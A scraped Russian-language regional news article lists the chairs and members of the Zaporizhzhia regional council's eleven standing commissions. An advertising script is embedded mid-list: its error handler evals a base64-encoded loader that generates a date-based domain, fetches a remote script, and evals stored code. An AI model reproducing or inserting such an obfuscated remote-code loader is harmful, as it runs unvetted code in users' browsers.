Важные новости
«Запорожгаз» — плевать на всех и армейские методы.Папа Римский или Тимошенко: Леди Гага пришла на инаугурацию Байдена…Известные запорожские исполнители авторской песни дадут онлайн-концерт“Работа кипит”: в Запорожье дорожники строят вторую часть балочного моста…«Уже в этом месяце»: украинским учителям поднимут зарплаты на 20%Сергій Лишенко – Навколо каолінового кар’єру мають місце політичні спекуляціїВ каких больницах Запорожья участники АТО могут получить бесплатное протезирование зубов Після локдауну учні можуть повернутися до очної і змішаної форм…Правильное проектирование пожарной сигнализации в Киеве: какие процессы включает? «Укртехнобез»…На Рекордной сгорел магазин стройматериалов: пожар тушили 34 спасателя (обновлено)В воздухе Запорожья зафиксировали превышение вредных веществ: чем это грозит

В Запорожской облсовете сформировали постоянные комиссии: состав

Депутаты Запорожского областного совета провели необходимые кадровые решения.

Кроме избрания руководящего состава совета, депутаты проголосовали за поименный состав профильных комиссий.

1. Комиссия по вопросам бюджета — 14 депутатов.

Председатель Владимир Кюрчев.

Члены комиссии:

Евгений БалицкийАлексей БеликовЕкатерина ГогунскаяВиктор ДудкаНаталья КруглякАлевтина ЛепетченкоМихаил МасловВиталий ПасевинАлександр ПередерийИрина СлавоваСергей ТкаченкоМаргарина ТрипольскаяСтанислав Чередниченко

2. Комиссия по вопросам экономического развития, инвестиций, регуляторной политики и предпринимательства – 6 депутатов.

Председатель – Олег Чернов

Члены комиссии:

Клишина АннаИрина ЛехОксана НевзороваИрина РуденкоРоман Терехов

3. По вопросам управления объектами совместной собственности территориальных громад области и жилищно-коммунального хозяйства – 9 депутатов

Председатель – Павел Тимофеев

Члены комиссии:

Виталий БоговинНина ГурскаяЛейла ИбрагимоваАлександр КоваленкоДмитрий КотловЭллина Позднякова-КирбятьеваДмитрий ТралинИгорь Шишка

4. Комиссия по гуманитарным вопросам – 7 депутатов

Председатель – Светлана Македонская

Члены комиссий:

Игорь АртюшенкоОксана БугайчукЕлена КрикунОльга СтадниченкоНиколай ФроловНиколай Ярмощук

5. По вопросам охраны здоровья, материнства и детства – 5 депутатов

Председатель – Наталья Авраменко.

Члены комиссии:

Анатолий БлохаЕвгений ГеоргиевВалентина ЗайцевВиктор Щербина

6. По вопросам социальной политики и труда – 11 депутатов

Председатель – Шевченко Геннадий var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Члены комиссии

Иван ГашенкоСергей ЖовнирСергей КальцевЮрий КапустянскийВиктор КатаевВладимир ЛюцкановПавел МатвиенкоСергей СелевичВладимир ТарасовАндрей Химичев

7. По вопросам АПК, сельскохозяйственного производства и земельных отношений – 5 депутатов

Председатель – Олег Николаенко

Члены комиссии:

Елена БодасюкЯрослав ИвановИван КурпаянидиВиталий Лупинос

8. По вопросам экологии, охраны недр и рационального природопользования – 7 депутатов

Председатель – Игорь Чумаченко

Члены комиссии:

Александр БилыйЛюдмила ЖелеваАлексей КравчунВалерия МатвиенкоНиколай ПастушенкоСергей Путря

9. По вопросам строительства, транспорта, связи и топливно-энергетического комплекса – 5 депутатов

Председатель – Александр Машинский

Члены комиссии:

Александр ГалицинОлег КалиманАртем поповВадим Сухина

10. По вопросам законности, борьбы с коррупцией, регламента, депутатской деятельности и депутатской этики, прав человека, свободы слова и информации – 5 депутатов

Председатель – Вячеслав Колесников

Члены комиссии:

Крилл ЕрмоленкоСергей ЛышенкоДмитрий ЧувашкинАлексей Холод

11. По вопросам местного самоуправления и административно-территориального устройства – 5 человек

Председатель – Дмитрий Майстро

Члены комиссии:

Аскад АшурбековСергей ДжуганЮлия КорниенкоТатьяна Ярмощук

Напомним, вчера в Запорожском областном совете выбрали нового председателя — Елену Жук, а также трех заместителей — первым замом стала Людмила Любим, заместителями — Владислав Куценко и Геннадия Фукса. (adsbygoogle = window.adsbygoogle || []).push({});

Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/v-zaporozhskoj-oblsovete-sformirovali-postoyannye-komissii-sostav/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top